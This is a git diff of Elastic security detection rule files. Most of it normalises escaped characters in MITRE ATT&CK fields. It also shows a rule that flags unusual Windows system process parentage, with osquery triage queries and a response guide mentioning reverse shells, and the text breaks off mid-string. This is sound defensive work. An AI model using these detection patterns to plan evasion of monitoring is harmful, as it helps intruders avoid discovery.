a/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json b/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json index 21e374fdcf8..2a82a52ff50 100644 --- a/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json +++ b/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json b/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json index 6d4556db5da..71d82704193 100644 --- a/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json index 6110935b72f..d3a3cbf3db2 100644 --- a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json +++ b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -70,7 +70,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json index 48dad282d27..0eb62938289 100644 --- a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -60,7 +60,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json index e41d90ce23a..3f5918450cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json +++ b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json index 6049160a246..0e89b56a0f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json 
@@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json index 472780974e0..829ee5f63f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json index 3e86fec8f83..6be58793a94 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json index 37d80e03766..8a3fb51d08a 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json index 2014200b09e..36ea89bd49b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json index 30a71364d7d..f3f7371838e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json index 57b1f4f0a6b..c61256ca6d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json index 62002670112..eb794eaa546 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json index 529bc0bb14e..6e7473941ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json index eee1eef7ba0..e8bc0f8c02c 100644 --- a/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json 
@@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json index f9c2c9281ba..57bca3fc572 100644 --- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Parent-Child Relationship",
- "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not 
process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n",
 "references": [
"https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png",
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json
index c378b913322..8aedd7526f1 100644
--- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Parent-Child Relationship",
- "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys 